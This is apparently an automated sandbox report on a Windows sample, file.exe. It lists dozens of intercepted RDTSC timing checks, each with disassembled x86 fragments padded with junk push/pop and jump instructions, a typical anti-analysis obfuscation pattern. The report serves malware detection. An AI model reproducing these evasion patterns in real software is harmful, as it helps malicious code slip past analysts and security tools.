Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C00CA second address: 54C00E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C00E1 second address: 54C00E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54C00E7 second address: 54C00EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E08D7 second address: 54E08DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E08DD second address: 54E08E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E08E1 second address: 54E08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C835FB0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E08FC second address: 54E096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 572Bh 0x0000000f mov si, 3B07h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FA22C516E3Fh 0x0000001f jmp 00007FA22C516E43h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FA22C516E48h 0x0000002b jmp 00007FA22C516E45h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E096F second address: 54E09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FB7h 0x00000009 add esi, 407C8F3Eh 0x0000000f jmp 00007FA22C835FB9h 0x00000014 popfd 0x00000015 mov ch, 12h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E09B6 second address: 54E09CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E09CA second address: 54E09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E09D0 second address: 54E09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E02D8 second address: 54E02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E02DC second address: 54E02E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E02E0 second address: 54E02E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E02E6 second address: 54E0301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov si, C8F7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 mov bh, al 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0301 second address: 54E0305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0305 second address: 54E030B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E030B second address: 54E0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0311 second address: 54E036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA22C516E45h 0x00000012 jmp 00007FA22C516E3Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007FA22C516E48h 0x0000001e add ecx, 5E8CA2D8h 0x00000024 jmp 00007FA22C516E3Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E036B second address: 54E0371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0371 second address: 54E039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E45h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E00C3 second address: 54E00F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA22C835FB0h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E00F2 second address: 54E00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E00F8 second address: 54E0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA22C835FB2h 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 mov cx, A5BDh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, edx 0x00000020 mov esi, edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0132 second address: 54E0138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0138 second address: 54E013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0F13 second address: 54E0FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C516E47h 0x00000009 add ah, 0000001Eh 0x0000000c jmp 00007FA22C516E49h 0x00000011 popfd 0x00000012 mov cx, B3E7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FA22C516E3Ah 0x0000001f push eax 0x00000020 pushad 0x00000021 mov dx, A1C4h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c jmp 00007FA22C516E48h 0x00000031 call 00007FA22C516E42h 0x00000036 mov ch, 3Ch 0x00000038 pop edi 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA22C516E49h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55001A1 second address: 55001A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55001A5 second address: 55001AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55001AB second address: 55001C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55001C2 second address: 5500286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA22C516E45h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007FA22C516E48h 0x00000016 movzx ecx, bx 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e jmp 00007FA22C516E3Ah 0x00000023 and dword ptr [eax], 00000000h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FA22C516E3Eh 0x0000002d sub eax, 4EC16378h 0x00000033 jmp 00007FA22C516E3Bh 0x00000038 popfd 0x00000039 mov edi, eax 0x0000003b popad 0x0000003c and dword ptr [eax+04h], 00000000h 0x00000040 jmp 00007FA22C516E42h 0x00000045 pop ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FA22C516E3Dh 0x0000004f and ecx, 6D7ABEC6h 0x00000055 jmp 00007FA22C516E41h 0x0000005a popfd 0x0000005b jmp 00007FA22C516E40h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5500286 second address: 550028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E01F0 second address: 54E01F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E01F4 second address: 54E01F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E01F8 second address: 54E01FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E01FE second address: 54E0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0203 second address: 54E0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA22C516E40h 0x0000000a or eax, 09870FD8h 0x00000010 jmp 00007FA22C516E3Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0234 second address: 54E0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0238 second address: 54E023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E023E second address: 54E0270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA22C835FABh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA22C835FB5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0270 second address: 54E0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0280 second address: 54E029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007FA22C835FADh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E029C second address: 54E02AD instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cl, bh 0x0000000e mov dl, al 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E02AD second address: 54E02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0D64 second address: 54F0DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA22C516E3Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA22C516E41h 0x00000017 xor si, 4C36h 0x0000001c jmp 00007FA22C516E41h 0x00000021 popfd 0x00000022 mov cx, 3C27h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007FA22C516E3Ah 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov di, DD70h 0x00000036 push ebx 0x00000037 pop esi 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0DCF second address: 54F0E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FB7h 0x00000009 and cx, 16CEh 0x0000000e jmp 00007FA22C835FB9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov di, 142Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5500008 second address: 550000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510EAA second address: 5510F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [774365FCh] 0x00000012 jmp 00007FA22C835FB2h 0x00000017 test eax, eax 0x00000019 jmp 00007FA22C835FB0h 0x0000001e je 00007FA29E6D8A1Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA22C835FB7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510F11 second address: 5510F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F9FAh 0x00000007 mov ebx, 3ABFBBC6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C516E48h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510F3C second address: 5510F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510F42 second address: 5510F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FA22C516E46h 0x00000010 and ecx, 1Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA22C516E47h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5510F7F second address: 552001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c mov esi, 406F58B3h 0x00000011 jmp 00007FA22C835FB8h 0x00000016 popad 0x00000017 leave 0x00000018 jmp 00007FA22C835FB0h 0x0000001d retn 0004h 0x00000020 nop 0x00000021 mov esi, eax 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 xor esi, dword ptr [00AA2014h] 0x0000002c push eax 0x0000002d push eax 0x0000002e push eax 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 call 00007FA2312F5FB6h 0x00000038 push FFFFFFFEh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA22C835FB7h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552001B second address: 552003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, 49EAh 0x00000013 call 00007FA22C516E3Bh 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552003B second address: 55200AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FA2312F5FF3h 0x00000010 mov edi, edi 0x00000012 jmp 00007FA22C835FADh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007FA22C835FACh 0x0000001e pushfd 0x0000001f jmp 00007FA22C835FB2h 0x00000024 jmp 00007FA22C835FB5h 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FA22C835FB1h 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov cl, DFh 0x00000035 mov dh, 4Bh 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55200AC second address: 55200B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55200B0 second address: 55200B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55200B4 second address: 55200BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D002C second address: 54D0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0042 second address: 54D008E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007FA22C516E43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FA22C516E49h 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FA22C516E3Eh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D008E second address: 54D00AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D00AB second address: 54D00BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D00BB second address: 54D00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D00BF second address: 54D00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FA22C516E47h 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA22C516E40h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D00F6 second address: 54D00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D00FA second address: 54D0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0100 second address: 54D0106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0106 second address: 54D01A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FA22C516E41h 0x00000012 mov dh, al 0x00000014 popad 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 mov ebx, 208BA40Ch 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f mov edx, ecx 0x00000021 push ecx 0x00000022 mov esi, edx 0x00000024 pop edx 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FA22C516E41h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e pushad 0x0000002f mov ebx, eax 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 popad 0x00000035 mov ebx, dword ptr [ebp+10h] 0x00000038 pushad 0x00000039 mov edx, eax 0x0000003b jmp 00007FA22C516E48h 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jmp 00007FA22C516E40h 0x00000047 push eax 0x00000048 jmp 00007FA22C516E3Bh 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D01A9 second address: 54D01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D01AD second address: 54D01C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D01C8 second address: 54D02CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA22C835FAFh 0x00000009 xor ecx, 258F1E3Eh 0x0000000f jmp 00007FA22C835FB9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA22C835FB0h 0x0000001b and si, 6338h 0x00000020 jmp 00007FA22C835FABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d movzx esi, dx 0x00000030 mov ax, bx 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007FA22C835FB8h 0x0000003a mov dword ptr [esp], edi 0x0000003d jmp 00007FA22C835FB0h 0x00000042 test esi, esi 0x00000044 pushad 0x00000045 mov dx, ax 0x00000048 pushfd 0x00000049 jmp 00007FA22C835FAAh 0x0000004e sub ax, 5F28h 0x00000053 jmp 00007FA22C835FABh 0x00000058 popfd 0x00000059 popad 0x0000005a je 00007FA29E714341h 0x00000060 jmp 00007FA22C835FB6h 0x00000065 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f pushfd 0x00000070 jmp 00007FA22C835FB8h 0x00000075 sub ecx, 1A8173E8h 0x0000007b jmp 00007FA22C835FABh 0x00000080 popfd 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02CB second address: 54D02E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FA29E3F518Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E3Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02E5 second address: 54D02EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02EB second address: 54D02EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02EF second address: 54D02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02F3 second address: 54D030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C516E3Ah 0x00000012 rdtsc
